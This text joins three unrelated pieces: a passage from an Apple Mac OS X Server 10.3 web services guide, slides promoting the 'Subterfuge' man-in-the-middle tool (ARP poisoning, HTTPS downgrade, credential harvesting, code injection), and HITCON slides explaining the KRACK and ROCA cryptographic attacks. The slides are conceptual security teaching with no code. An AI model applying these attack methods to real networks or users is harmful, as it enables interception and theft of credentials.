watchdog process to ensure continuous availability of JBoss once JBoss has been
started. You can use Server Admin to start one of the available JBoss configurations,
stop JBoss, and view the log files.
Two web-based tools for working with JBoss are also included with Mac OS X Server,
one for management and configuration of the JBoss server and one for deployment of
existing applications. Both tools are located in /Library/JBoss/Application.
LL2350.book Page 56 Friday, August 22, 2003 2:32 PM
Chapter 6 Working With Open-Source Applications
57
For detailed information about JBoss, J2EE, and the tools, see these guides:
• Java application server administration guide, which explains how to deploy and
manage J2EE applications using JBoss in Mac OS X Server
• Java enterprise applications guide, which explains how to develop J2EE applications
Both guides are available from Apple developer publications.
Additional information about these Java technologies is available online.
• For JBoss, see www.jboss.org/.
• For J2EE, see java.sun.com/j2ee/.
To open the JBoss management tool:
m In Server Admin, click Application Server in the list for the server you want.
To start or stop JBoss:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar.
3 Select one of the JBoss options. (Do not select Tomcat Only.)
4 Click Start Service or Stop Service.
JBoss is preconfigured to use a local configuration.
With JBoss turned on, you can use the management tool to configure your server.
For details of configuring JBoss and using the command-line tools for it, see the Java
application server administration guide, which explains how to deploy and manage
J2EE applications using JBoss in Mac OS X Server. This guide is available from Apple
developer publications.
To change the JBoss configuration in use:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar.
3 Do one of the following:
• Click Load Remote Configuration and type the location of a JBoss NetBoot server.
• Click Use Local Configuration and choose a configuration from the pop-up menu.
LL2350.book Page 57 Friday, August 22, 2003 2:32 PM
58
Chapter 6 Working With Open-Source Applications
To manage JBoss:
1 In Server Admin, click Application Server.
2 Click Settings in the button bar.
3 Click Manage JBoss.
Note: The JBoss management tool must already be running. You can use the Terminal
application to set it as a startup item.
4 Make the adjustments you want in the management console.
Backing Up and Restoring JBoss Configurations
You use the Application Server section of Server Admin to back up and restore JBoss
configurations.
To back up or restore a JBoss configuration:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar at the bottom of the window.
3 Click Backup at the top of the window.
4 Click either Backup or Restore and navigate to the location where you want to store or
have stored configurations.
The current configuration is backed up.
Tomcat
Tomcat is the open source servlet container that is used as the official Reference
Implementation for the Java Servlet and JavaServer Pages technologies. The Java
Servlet and JavaServer Pages specifications are developed by Sun under the Java
Community Process.
The current production series is the Tomcat 4.1.x series and it implements Java Servlet
2.3 and JavaServer Pages 1.2 specifications. More information is available from the
following sources:
• For Java Servlet specifications, see java.sun.com/products/servlets
• For Java ServerPages specifications, see java.sun.com/products/jsp
In Mac OS X Server 10.3, you use the Application Server section of Server Admin to
manage Tomcat. Once Tomcat is started its life cycle is managed by Server Admin,
which ensures that Tomcat starts up automatically after a power failure or after the
server shuts down for any reason.
For more information about Tomcat and documentation for this software, see
http://jakarta.apache.org/tomcat/
LL2350.book Page 58 Friday, August 22, 2003 2:32 PM
Chapter 6 Working With Open-Source Applications
59
For information about Java Servlets that you can use on your server, see
• http://java.sun.com/products/servlet/
• http://java.sun.com/products/jsp/
If you want to use Tomcat, you must activate it. You can use Server Admin or the
command-line tool to start Tomcat.
To start Tomcat using Server Admin:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar.
3 Click Tomcat Only.
4 Click Start Service.
To start Tomcat using Terminal:
1 Open the Terminal application.
2 Type the following commands:
cd /Library/Tomcat/bin
./catalina.sh start
To verify that Tomcat is running, use a browser to access port 9006 of your website by
entering the URL for your site followed by :9006. If Tomcat is running, this URL will
display the Tomcat home page.
MySQL
MySQL provides a relational database management solution for your web server. With
this open-source software, you can link data in different tables or databases and
provide the information on your website.
The MySQL Manager application simplifies setting up the MySQL database on
Mac OS X Server. You can use MySQL Manager to initialize the MySQL database, and to
start and stop the MySQL service.
MySQL is preinstalled on Mac OS X Server, with its various files already in the
appropriate locations. At some point you may wish to upgrade to a newer version of
MySQL. You can install the new version in /usr/local/mysql, but MySQL Manager will
not be aware of the new version of MySQL and will continue to control the pre-
installed version. If you do install a newer version of MySQL, use MySQL Manager to
stop the preinstalled version, then start the newer version via the config file.
LL2350.book Page 59 Friday, August 22, 2003 2:32 PM
60
Chapter 6 Working With Open-Source Applications
Installing MySQL
Mac OS X Server versions 10.3 includes the latest MySQL, version 4.0.14. Since it's
preinstalled, you won't find it in /usr/local/mysql. Instead, its elements are distributed in
the file system according to standard UNIX file layout, with executables in /usr/sbin and
/usr/bin, man pages in /usr/share/man, and other parts in /usr/share/mysql. When
installed, the MySQL database resides in /var/mysql.
At some point a newer version of MySQL will be posted to http://www.mysql.com. At
that time you may consider downloading the source and building it yourself (if you
have the developer packages installed) or downloading the appropriate binary
distribution and installing it yourself, following the instructions posted on that website.
By default, such installations reside in /usr/local/mysql/. So if you install your own
version of MySQL, you'll have two versions of MySQL present on your system. This
should do no harm as long as you don't try to run both the old one and the new one.
Just be sure to prefix any commands intended for the new version with the full path
(starting with /usr/local/mysql), or make sure your shell's path variable is set to search
in your local directory first.
Note that the MySQL Manager application works only with the preinstalled version of
MySQL; it does not work with MySQL installed elsewhere. The paths to the various
preinstalled components of MySQL are stored in the following plist file:
/Applications/Server/MySQL Manager.app/Contents/Resources/tool_strings.
If You Are Updating from Mac OS X Server 10.x and Use MySQL
Mac OS X Server version 10.3 contains a new version of MySQL. Previous versions of the
server contain MySQL 3.23.x; the version now installed is 4.0.14, which is the latest
production version. This version is the one recommended by mysql.com.
Your MySQL 3.23.x databases should work with the new version of MySQL, but it’s a
good idea to back them up before updating.
When using MySQL 4.0.14, there are several commands you can use with your old
databases to remove dependency on the ISAM table format, which has been
deprecated over time.
• Use mysql_fix_privilege_tables to enable new security privilege features.
• Use mysql_convert_table_format (if all existing tables are ISAM or MyISAM) or use
ALTER TABLE table_name TYPE+MyISAM on all ISAM tables to get away from the
degraded ISAM table format.
Refer to the instructions provided on the MySQL website at www.mysql.com/doc/en/
Upgrading-from-3.23.html before using these commands.
For more information about MySQL, see www.mysql.com.
LL2350.book Page 60 Friday, August 22, 2003 2:32 PM
7
61
7 Installing and Viewing
Web Modules
Become familiar with the modules that provide key
features and controls for web service.
The Apache web server includes a series of modules that control the server’s operation.
In addition, Mac OS X Server provides some modules with specialized functions for the
Macintosh.
Apache Modules
Modules “plug in” to the Apache web server software and add functionality to your
website. Apache comes with some standard modules, and you can purchase modules
from software vendors or download them from the Internet. You can find information
about available Apache modules at the website www.apache.org/docs/mod.
To work with Apache modules:
• To view a list of web modules installed on your server, in Server Admin click Web in
the list for the server you want, choose Settings in the button bar, and click Modules.
• To enable a module, select the Enabled box beside its name, and click Save. (Web
service restarts automatically.)
• To install a module, follow the instructions that came with the module software. The
web server loads modules from the directory /usr/libexec/httpd/.
Macintosh-Specific Modules
Web service in Mac OS X Server installs some modules specific to the Macintosh. These
modules are described in this section.
mod_macbinary_apple
This module packages files in the MacBinary format, which allows Macintosh files to be
downloaded directly from your website. A user can download a MacBinary file using a
regular web browser by adding “.bin” to the URL used to access the file.
LL2350.book Page 61 Friday, August 22, 2003 2:32 PM
62
Chapter 7 Installing and Viewing Web Modules
mod_sherlock_apple
This module lets Apache perform relevance-ranked searches of the website using
Sherlock. Once you index your site using the Finder, you can provide a search field for
users to search your website.
m To index a folder’s contents, choose Get Info from the file menu.
Note: You must be logged in as root for the index to be copied to the web directory in
order to be searchable by a browser.
Clients must add .sherlock to your website’s URL to access a page that allows them to
search your site. For example, http://www.example.com/.sherlock.
mod_auth_apple
This module allows a website to authenticate users by looking for them in directory
service domains within the server’s search policy. When authentication is enabled,
website visitors are prompted for a user name and password before they can access
information on the site.
mod_hfs_apple
This module requires users to enter URLs for HFS volumes using the correct case
(lowercase or uppercase). This module adds security for case-insensitive volumes. If a
restriction exists for a volume, users receive a message that the URL is not found.
mod_digest_apple
The new mod_digest_apple module enables digest authentication for a WebDAV
realm.
mod_rendezvous_apple
The new mod_rendezvous_apple module allows administrators to control how
websites are registered with Rendezvous. See “Enabling Apache Rendezvous
Registration” on page 51 for more information.
Open-Source Modules
Mac OS X Server includes these popular open-source modules: Tomcat, PHP: Hypertext
Preprocessor, and mod_perl.
Tomcat
The Tomcat module, which uses Java-like scripting, is the official reference
implementation for two complementary technologies developed under the Java
Community Process. For more information about Tomcat, see “Tomcat” on page 58.
If you want to use Tomcat, you must activate it first. You use the Application Server
section of Server Admin to start Tomcat. See “Tomcat” on page 58 for instructions.
LL2350.book Page 62 Friday, August 22, 2003 2:32 PM
Chapter 7 Installing and Viewing Web Modules
63
PHP: Hypertext Preprocessor
PHP lets you handle dynamic web content by using a server-side HTML-embedded
scripting language resembling C. Web developers embed PHP code within HTML code,
allowing programmers to integrate dynamic logic directly into an HTML script rather
than write a program that generates HTML.
PHP provides CGI capability and supports a wide range of databases. Unlike client-side
JavaScript, PHP code is executed on the server. PHP is also used to implement WebMail
on Mac OS X Server. For more information about this module, see www.php.net.
mod_perl
This module integrates the complete Perl interpreter into the web server, letting
existing Perl CGI scripts run without modification. This integration means that the
scripts run faster and consume fewer system resources. For more information about
this module, see perl.apache.org.
LL2350.book Page 63 Friday, August 22, 2003 2:32 PM
LL2350.book Page 64 Friday, August 22, 2003 2:32 PM
8
65
8 Solving Problems
If you experience a problem with web service or one of
its components, check the tips and strategies in this
chapter.
From time to time you may encounter a problem when setting up or managing web
services. Some of the situations that may cause a problem for administering web
service or for client connections are outlined here.
Users Can’t Connect to a Website on Your Server
Try these strategies to uncover the problem:
• Make sure that web service is turned on and the site is enabled.
• Check the Web Service Overview window to verify that the server is running.
• Check the Apache access and error logs. (If you are not sure what the messages
mean, you’ll find explanations on the Apache website at www.apache.org.)
• Make sure users are entering the correct URL to connect to the web server.
• Make sure that the correct folder is selected as the default web folder. Make sure that
the correct HTML file is selected as the default document page.
• If your website is restricted to specific users, make sure those users have access
privileges to your website.
• Verify that users’ computers are configured correctly for TCP/IP. If the TCP/IP settings
appear correct, use a “pinging” utility that allows you to check network connections.
• Verify that the problem is not a DNS problem. Try to connect with the IP address of
the server instead of its DNS name.
• Make sure your DNS server’s entry for the website’s IP address and domain name
are correct.
LL2350.book Page 65 Friday, August 22, 2003 2:32 PM
66
Chapter 8 Solving Problems
A Web Module Is Not Working as Expected
• Check the error log in Server Admin for information about why the module might
not be working correctly.
• If the module came with your web server, check the Apache documentation for that
module and make sure the module is intended to work the way you expected.
• If you installed the module, check the documentation that came with the web
module to make sure it is installed correctly and is compatible with your server
software.
For more information on supported Apache modules for Mac OS X Server, see
Chapter 7, “Installing and Viewing Web Modules,” on page 61 and the Apache website
at www.apache.org/docs/mod/.
A CGI Will Not Run
• Check the CGI’s file permissions to make sure the CGI is executable by www. If not,
the CGI won’t run on your server even if you enable CGI execution in Server Admin.
LL2350.book Page 66 Friday, August 22, 2003 2:32 PM
9
67
9 Where to Find More Information
For information about configuration files and other
aspects of Apache web service, see these resources:
• Apache: The Definitive Guide, 3rd edition, by Ben Laurie and Peter Laurie (O’Reilly and
Associates, 2002)
• CGI Programming with Perl, 2nd edition, by Scott Guelick, Shishir Gundavaram, and
Gunther Birznieks (O’Reilly and Associates, 2000)
• Java Enterprise in a Nutshell, 2nd edition, by William Crawfod, Jim Farley, and David
Flanagan (O’Reilly and Associates, 2002)
• Managing and Using MySQL, 2nd edition, by George Reese, Randy Jay Yarger, Tim
King, and Hugh E. Williams (O’Reilly and Associates, 2002)
• Web Performance Tuning, 2nd edition, by Patrick Killelea (O’Reilly and Associates,
2002)
• Web Security, Privacy & Commerce, 2nd edition, by Simson Garfinkel and Gene
Spafford (O’Reilly and Associates, 2001)
• Writing Apache Modules with Perl and C, by Lincoln Stein and Doug MacEachern
(O’Reilly and Associates, 1999)
• For more information about Apache, see the Apache website: www.apache.org
• For an inclusive list of methods used by WebDAV clients, see RFC 2518. RFC
documents provide an overview of a protocol or service that can be helpful for
novice administrators, as well as more detailed technical information for experts.
You can search for RFC documents by number at this website:
www.faqs.org/rfcs
LL2350.book Page 67 Friday, August 22, 2003 2:32 PM
LL2350.book Page 68 Friday, August 22, 2003 2:32 PM
69
Glossary
Glossary
Apache An open-source HTTP server that is integrated into Mac OS X Server. You can
find detailed information about Apache at www.apache.org.
application server Software that runs and manages other applications, usually web
applications, that are accessed using a web browser. The managed applications reside
on the same computer where the application server runs.
CGI (Common Gateway Interface) A script or program that adds dynamic functions to
a website. A CGI sends information back and forth between a website and an
application that provides a service for the site. For example, if a user fills out a form on
the site, a CGI could send the message to an application that processes the data and
sends a response back to the user.
everyone Any user who can log in to a file server: a registered user or guest, an
anonymous FTP user, or a website visitor.
HTML (Hypertext Markup Language) The set of symbols or codes inserted in a file to
be displayed on a World Wide Web browser page. The markup tells the web browser
how to display a webpage’s words and images for the user.
HTTP (Hypertext Transfer Protocol) The client/server protocol for the World Wide Web.
The HTTP protocol provides a way for a web browser to access a web server and
request hypermedia documents created using HTML.
IP (Internet Protocol) Also known as IPv4. A method used with Transmission Control
Protocol (TCP) to send data between computers over a local network or the Internet. IP
delivers packets of data, while TCP keeps track of data packets.
IP address A unique numeric address that identifies a computer on the Internet.
JavaScript A scripting language used to add interactivity to webpages.
JBoss A full-featured Java application server that provides support for Java 2 Platform,
Enterprise Edition (J2EE) applications.
LL2350.book Page 69 Friday, August 22, 2003 2:32 PM
70
Glossary
Mac OS X Server An industrial-strength server platform that supports Mac, Windows,
UNIX, and Linux clients out of the box and provides a suite of scalable workgroup and
network services plus advanced remote management tools.
MySQL An open-source relational database management tool for web servers.
open source A term for the cooperative development of software by the Internet
community. The basic principle is to involve as many people as possible in writing and
debugging code by publishing the source code and encouraging the formation of a
large community of developers who will submit modifications and enhancements.
owner The person who created a file or folder and who therefore has the ability to
assign access privileges for other users. The owner of an item automatically has read/
write privileges for that item. An owner can also transfer ownership of an item to
another user.
PHP (PHP: Hypertext Preprocessor) A scripting language embedded in HTML that is
used to create dynamic webpages.
port A sort of virtual mail slot. A server uses port numbers to determine which
application should receive data packets. Firewalls use port numbers to determine
whether or not data packets are allowed to traverse a local network. “Port” usually
refers to either a TCP or UDP port.
protocol A set of rules that determines how data is sent back and forth between two
applications.
proxy server A server that sits between a client application, such as a web browser,
and a real server. The proxy server intercepts all requests to the real server to see if it
can fulfill the requests itself. If not, it forwards the request to the real server.
realm See WebDAV realm.
short name An abbreviated name for a user. The short name is used by Mac OS X for
home directories, authentication, and email addresses.
SSL (Secure Sockets Layer) An Internet protocol that allows you to send encrypted,
authenticated information across the Internet.
TCP (Transmission Control Protocol) A method used along with the Internet Protocol
(IP) to send data in the form of message units between computers over the Internet. IP
takes care of handling the actual delivery of the data, and TCP takes care of keeping
track of the individual units of data (called packets) into which a message is divided for
efficient routing through the Internet.
Tomcat The official reference implementation for Java Servlet 2.2 and JavaServer Pages
1.1, two complementary technologies developed under the Java Community Process.
LL2350.book Page 70 Friday, August 22, 2003 2:32 PM
Glossary
71
URL (Uniform Resource Locator) The address of a computer, file, or resource that can
be accessed on a local network or the Internet. The URL is made up of the name of the
protocol needed to access the resource, a domain name that identifies a specific
computer on the Internet, and a hierarchical description of a file location on the
computer.
user name The long name for a user, sometimes referred to as the user’s “real” name.
See also short name.
WebDAV (Web-based Distributed Authoring and Versioning) A live authoring
environment that allows client users to check out webpages, make changes, and then
check the pages back in while a site is running.
WebDAV realm A region of a website, usually a folder or directory, that is defined to
provide access for WebDAV users and groups.
LL2350.book Page 71 Friday, August 22, 2003 2:32 PM
LL2350.book Page 72 Friday, August 22, 2003 2:32 PM
73
Index
Index
A
access privileges
setting for WebDAV 10
websites 11, 14
Apache module 7, 9, 29, 51, 60, 61
Apache web server 8, 61
configuration 9
C
CA certificate 45
cache. See proxy cache
certificate file 45–47
CGI (Common Gateway Interface) 8
CGI programs
problems with 66
CGI scripts
enabling 33
installing 33
solving problems 66
CSR (certificate signing request) 45–46
D
Documents folder 13
F
folders
Documents folder 13
I
Internet servers. See web servers
J
Java
JavaServer Pages (JSP) with Tomcat 21
servlet (with Tomcat) 21
Tomcat and 21
L
logs
access 27
error 27
SSL 35
web service 22
M
Macintosh-specific web modules 61
MIME (Multipurpose Internet Mail Extension) 12
mappings 16
server response, setting 34
suffixes 11
type mapping 11
types 16
Types pane 16
understanding 11
web server responses 11
mod_auth_apple module 62
mod_hfs_apple module 62
mod_macbinary_apple module 61
mod_perl module 63
mod_sherlock_apple module 62
Multipurpose Internet Mail Extension. See MIME
MySQL Manager 59
MySQL module 59
O
open source modules 60, 62, 63
LL2350.book Page 73 Friday, August 22, 2003 2:32 PM
74
Index
P
Perl
mod_perl 63
PHP (PHP Hypertext Preprocessor) 63
Apache module 63
enabling 36
PHP Hypertext Preprocessor (PHP) See PHP (PHP
Hypertext Preprocessor)
proxy 19
blocking websites with 20
proxy cache
enabling 19
proxy server 20
R
realms, WebDAV 10
resources
web service 67
S
scripts
See CGI scripts
Secure Sockets Layer (SSL)
See SSL (Secure Sockets Layer)
security
WebDAV 10
websites 11
Server Admin 23
configuring web server 9
mime_macosxserver.conf file 34
modifying MIME type mappings 16
SSL, enabling 47
starting or stopping web service 15
starting Tomcat 22
viewing web service logs 22
viewing web service status 22
servers
Apache web server 9
enabling SSL on 47
proxy servers 19, 20, 36
server side includes See SSI
settings
MIME types 16
web service 15
SQL 59
SquirrelMail See WebMail
SSI (server side includes) 8
enabling 33
SSL (Secure Sockets Layer) 8
certificate signing request (CSR) 45
described 9
enabling 47
setting up 35, 45
website certificate 46
T
Tomcat module 62
Java and 21
Java servlet 21
JSP (JavaServer Pages) 21
starting 21
troubleshooting
web service 65–66
U
Users 65
W
Web-based Distributed Authoring and Versioning
(WebDAV)See WebDAV (Web-based Distributed
Authoring and Versioning)
web browsers 10
WebDAV (Web-based Distributed Authoring and
Versioning) 8
defining realms 10
described 7
enabling 21, 30
security 10
setting access 31
setting access privileges 10
setting up 21
understanding 10
WebMail
about 41
configuring 43–44
enabling 42
logging in 42
mail server and 42
protocols 42
security limitations 42
SquirrelMail 41
web modules 60, 61
Mac-specific 61
open-source 62
webpages
default 13
web servers
Apache web server 9
certificate for 46–47
web service 7
configuring 9, 14
default page 13
described 7
Documents folder 13
limiting simultaneous 17
logs, viewing 22
monitoring 22
more information 67
MySQL 59
persistent connections 18
LL2350.book Page 74 Friday, August 22, 2003 2:32 PM
Index
75
problems with 65–66
resources 67
secure transactions 9, 45–47
settings for 15
setting up 13–15
setting up websites 9
solving problems 65
SSL, enabling 20–36
starting 15
stopping 15
Tomcat 21
WebDAV 21
WebMail, managing 42–44
website privileges 14
websites 23–36
access privileges 11
assigning privileges 14
connecting to 15
connection problems 65
default page 13, 25
default Web Folder 25
directory listing 28
documents Folder 23
enabling 24
hosting 10, 14
improving performance 26
information about 23
logs 27
MIME, configuring 35
monitoring 34
security of 11
setting access port 26
setting up 9
setting up SSL 35
solving problems 65–66
web technologies
about 7
preparing for setup 7–12
LL2350.book Page 75 Friday, August 22, 2003 2:32 PM | pdf |
Christopher
M.
Shields
r00t0v3rr1d3
Ma1hew
M.
Toussain
0sm0s1z
Chris –
Custom Attack Tools and Project
Management
Matt –
Interface Design and Framework
Development
Basic ARP Poison
Heavy Network Traffic
Periods of MITM Loss
Python Tool With
Scapy
Intelligent Network
Poison
Dynamic Poison
Retention
Ø HTTPS Downgrade Attack
Ø Use as a Web Proxy
Ø Customizations for Subterfuge
A New MITM Tool –
Ø Intuitive Interface
Ø Easy to use
Ø Silent and Stealthy
Ø Open Source
Ø Server/Client Architecture
Ø MITM Utilities
Ø Module Builder
Ø Configuration Options
Ø Credential Harvesting
Ø HTTP Code Injection
Ø Denial of Service
Ø Network View
?
?
? | pdf |
2017/12/07
HITCON PACIFIC
1
KRACK & ROCA
吳忠憲 1,3
陳君明 1,2,3
J.-S. Wu Jimmy Chen
1.
NTU, National Taiwan University
2.
IKV, InfoKeyVault Technology
3.
CHROOT & HITCON
Agenda
KRACK Key Reinstallation Attacks
– Serious weaknesses in WPA2, a protocol that
secures all modern protected Wi-Fi networks
ROCA Return of Coppersmith’s Attack
– A vulnerability in the implementation of RSA
key pair generation in a cryptographic library
used in a wide range of cryptographic chips
2017/12/07
HITCON PACIFIC
2
KRACK
2017/12/07
HITCON PACIFIC
3
14 Years of WPA/WPA2
1997: WEP (completely broken)
2003: WPA
2004: WPA2
Many attacks against Wi-Fi, but
Handshake & encryption remain “secure”
– Until 2017
– KRACK discovered by Mathy Vanhoef
2017/12/07
HITCON PACIFIC
4
2017/12/07
HITCON PACIFIC
5
10 CVE IDs for KRACKs
Targeting different aspects of WPA/WPA2
– CVE-2017-130{77,78,79,80,81}
– CVE-2017-130{82,84,86,87,88}
2017/12/07
HITCON PACIFIC
6
10 CVE IDs for KRACKs
Targeting different aspects of WPA/WPA2
– CVE-2017-130{77,78,79,80,81}
– CVE-2017-130{82,84,86,87,88}
Let’s see how to KRACK the 4-way
handshake
2017/12/07
HITCON PACIFIC
7
Before the 4-way Handshake
A client and an AP need to setup a
shared secret master key MK
2017/12/07
HITCON PACIFIC
8
“Personal” Network
2017/12/07
HITCON PACIFIC
9
MK = Password
MK = Password
MK = Password
MK = Password
“Enterprise” Network
2017/12/07
HITCON PACIFIC
10
MK1
MK1
MK3
MK3
MK2
MK2
MK4
MK4
MK5
MK5
802.1X
PEAP
Certificate
Username
Password
The 4-way Handshake
Based on a shared MK between an AP
and a client…
Mutual authentication
Negotiate a fresh temporal key TK
– for actual encryption
– can be refreshed
2017/12/07
HITCON PACIFIC
11
2017/12/07
HITCON PACIFIC
12
Msg1 (ANonce)
Msg2 (CNonce, …)
Msg3 (…)
Msg4 (…)
Client
AP
compute TK
install TK
reset PN
compute TK
install TK
reset PN
setup MK
setup MK
WPA2 Wi-Fi Encryption
3 parameters are installed on both ends
– the temporal key TK
– the RxPN (replay counter)
– the TxPN (encryption nonce)
Using CCM or GCM with AES-128
– TK is the encryption key
2017/12/07
HITCON PACIFIC
13
2017/12/07
HITCON PACIFIC
14
Msg1 (ANonce)
Msg2 (CNonce, …)
Msg3 (…)
Msg4 (…)
Client
AP
compute TK
install TK
reset PN
compute TK
install TK
reset PN
encrypted packets
setup MK
setup MK
2017/12/07
HITCON PACIFIC
15
Msg1 (ANonce)
Msg2 (CNonce, …)
Msg3 (…)
Msg4 (…)
Client
AP
compute TK
install TK
reset PN
compute TK
encrypted packets
setup MK
setup MK
Key Reinstallation
Under the same secret key…
If encryption nonce (TxPN) gets reset:
– packets can be decrypted
– packets can be spoofed (for GCM)
If replay counter (RxPN) gets reset:
– packets can be replayed
2017/12/07
HITCON PACIFIC
16
2017/12/07
HITCON PACIFIC
17
Msg3 (…)
Msg4
Client (victim)
AP
install TK
reset PN
enc. packets
Msg3 (…)
timeout
for Msg4
Msg4
enc. packets
reinstall TK
reset PN
Reinstall an All-Zero Key
A serious bug found in wpa_supplicant
Android 6.0+ and Linux
2017/12/07
HITCON PACIFIC
18
Man-in-the-Middle
2017/12/07
HITCON PACIFIC
19
Channel 1
Channel 2
21:D8:29:06:B7:58
5B:16:E3:54:71:A6
5B:16:E3:54:71:A6
21:D8:29:06:B7:58
Many Networks are “Unaffected” by KRACK
2017/12/07
HITCON PACIFIC
20
MK = Password
MK = Password
MK = Password
MK = Password
2017/12/07
HITCON PACIFIC
21
Properly configured
HTTPS, TLS, VPN…
are unaffected too
KRACK the Wi-Fi Fast Roaming
Enterprise networks with multiple APs
– clients are moving
FT (Fast Transition) handshake
2017/12/07
HITCON PACIFIC
22
MK
MK
Moving
KRACK the Wi-Fi Fast Roaming
Enterprise networks with multiple APs
– clients are moving
FT (Fast Transition) handshake
– similar reinstallation issue on the AP side
– no replay counter at all
– more exploitable!!!
2017/12/07
HITCON PACIFIC
23
No MitM Needed to KRACK FT
2017/12/07
HITCON PACIFIC
24
21:D8:29:06:B7:58
5B:16:E3:54:71:A6
replay
handshake
messages
The Root Cause of KRACK
The IEEE 802.11 standards didn’t specify
the precise behaviors
Previous formal analyses didn’t model
“key installation”
– 4-way handshake proven secure
– CCM/GCM encryption proven secure
2017/12/07
HITCON PACIFIC
25
Fix the KRACK Vulnerabilities
Both clients and APs need patches
– Android 6.0+ and Linux devices!
– APs in enterprise networks!
Don’t do the harmful key reinstallation
Mitigate at the other end
2017/12/07
HITCON PACIFIC
26
Lessons Learned (1/2)
Good spec & correct code
Abstract model vs. reality
2017/12/07
HITCON PACIFIC
27
Lessons Learned (2/2)
What if some part of your infrastructure is
compromised?
– control the threats
Encrypt everything properly in transit
– don’t assume enough (if any) security from
(wireless) LAN
– HTTPS, TLS, VPN
2017/12/07
HITCON PACIFIC
28
ROCA
2017/12/07
HITCON PACIFIC
29
Crypto Flaws on Chips
EasyCard (悠遊卡) / Mifare Classic, NXP, 2008
Citizen Certificate (自然人憑證), Renesas, 2013
– “Coppersmith in The Wild”
Devices around the world, Infineon, 2017
– “Return of Coppersmith’s Attack (ROCA)”
– CVE-2017-15361
2017/12/07
HITCON PACIFIC
30
EasyCard / Mifare NXP
The "Mifare Classic" RFID chip is used in hundreds of
transport systems — London, Boston, Los Angeles,
Amsterdam, Taipei, Shanghai, Rio de Janeiro — and as
an access pass in thousands of companies, schools,
hospitals, and government buildings all over the world
The group that broke Mifare Classic is from
Radboud University Nijmegen in the Netherlands
The security of Mifare Classic is terrible —
kindergarten cryptography
2017/12/07
HITCON PACIFIC
31
Source: Schneier on Security
https://www.schneier.com/blog/archives/2008/08/hacking_mifare.html
EasyCard / Mifare NXP
NXP called disclosure of the attack “irresponsible”,
warned that it will cause “immense damages”
The Dutch court would have none of it: “Damage
to NXP is not the result of the publication of the
article but of the production and sale of a chip that
appears to have shortcomings”
NXP Semiconductors lost the court battle to
prevent the researchers from publishing
2017/12/07
HITCON PACIFIC
32
Source: Schneier on Security
https://www.schneier.com/blog/archives/2008/08/hacking_mifare.html
EasyCard / Mifare NXP
2017/12/07
HITCON PACIFIC
33
https://www.ithome.com.tw/node/63075
EasyCard / Mifare NXP
2017/12/07
HITCON PACIFIC
34
http://news.ltn.com.tw/news/society/paper/658204
Crypto Flaws on Chips
EasyCard (悠遊卡) / Mifare Classic, NXP, 2008
Citizen Certificate (自然人憑證), Renesas, 2013
– “Coppersmith in The Wild”
Devices around the world, Infineon, 2017
– “Return of Coppersmith’s Attack (ROCA)”
– CVE-2017-15361
2017/12/07
HITCON PACIFIC
35
Citizen Certificate Renesas
The Renesas HD65145C1 chip is a "High-Security
16-bit Smart Card Microcontroller" used in many
high-security applications, including banking
This chip received a certificate, that certifies the chip
was conformant with Protection Profile BSI-PP-0002-
2001 at Common Criteria assurance level EAL4+
HD65145C1 was used in the Chunghwa Telecom
HICOS PKI Smart Card, which received FIPS 140-2
Validation Certificate at Level 2 from NIST, USA
2017/12/07
HITCON PACIFIC
36
Source: Coppersmith in the wild
https://smartfacts.cr.yp.to/index.html
103 Citizen Certificate using Renesas HD65145C1 chip
were broken by computing GCD of RSA public moduli
– Some RSA moduli N1 = p q and N2 = p r
– GCD(N1, N2) = p, thus both N1 and N2 are factored
Most frequent primes found
–
0xc00000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000002f9
–
0xc92424922492924992494924492424922492924992494924492424922492924
992494924492424922492924992494924492424922492924992494924492424e5
–
0xf6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db
66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdb6ddb6d6db66db6b6dbb6dbdbc1
2017/12/07
HITCON PACIFIC
37
Citizen Certificate Renesas
Source: Coppersmith in the wild
https://smartfacts.cr.yp.to/index.html
2017/12/07
HITCON PACIFIC
38
https://smartfacts.cr.yp.to/smartfacts-20130916.pdf
2017/12/07
HITCON PACIFIC
39
Citizen Certificate Renesas
2017/12/07
HITCON PACIFIC
40
http://www.moi.gov.tw/info/news_content.aspx?sn=7771&page=0
2017/12/07
HITCON PACIFIC
41
Lattice
𝐿 =
𝑎1𝐮𝟏 + 𝑎2𝐮𝟏 𝑎1, 𝑎2 ∈ ℤ }
=
𝑎1𝐮𝟏 + 𝑎2𝐮𝟏 𝑎1, 𝑎2 ∈ ℤ } is a 2-dim lattice
𝐮𝟏, 𝐮𝟏 : good basis
𝐮𝟏, 𝐮𝟏 : bad basis
Image courtesy:
https://en.wikipedia.org/wiki/Lattice_reduction
SVP (Shortest Vector
Problem) is hard if the
dimension is high
RSA modulus N = p q
If p = ax + b where a, b are known, and
x is small enough, then x can be found
by Don Coppersmith’s algorithm
Generate a lattice by known information
(N, a, b), then solve SVP on the lattice
2017/12/07
HITCON PACIFIC
42
Coppersmith’s Attack
Crypto Flaws on Chips
EasyCard (悠遊卡) / Mifare Classic, NXP, 2008
Citizen Certificate (自然人憑證), Renesas, 2013
– “Coppersmith in The Wild”
Devices around the world, Infineon, 2017
– “Return of Coppersmith’s Attack (ROCA)”
– CVE-2017-15361
2017/12/07
HITCON PACIFIC
43
ROCA
ROCA Return of Coppersmith’s Attack
The vulnerability was discovered by Slovak
and Czech security researchers from the
Centre for Research on Cryptography and
Security at Masaryk University, Czech
Republic; Enigma Bridge Ltd, Cambridge, UK;
and Ca' Foscari University of Venice, Italy
2017/12/07
HITCON PACIFIC
44
Prime Generation
Textbook prime generation for RSA-1024
– Choose a 512-bit random odd integer
1 …… …… …… 1
– Test divisibility for small primes: 3, 5, 7, 11, …
– Run the Miller-Rabin test enough times
• Reference Standard: FIPS 186-4
2017/12/07
HITCON PACIFIC
45
510 random bits
Earlier Work
2017/12/07
HITCON PACIFIC
46
https://www.usenix.org/node/197198
Earlier Work
2017/12/07
HITCON PACIFIC
47
https://www.usenix.org/node/197198
Motivation
Distribution of RSA keys modulo small primes
2017/12/07
HITCON PACIFIC
48
https://crocs.fi.muni.cz/_media/public/papers/ccs-nemec-handout.pdf
Black-Box Attack
The researchers had access neither to the
library’s source code nor to the object code
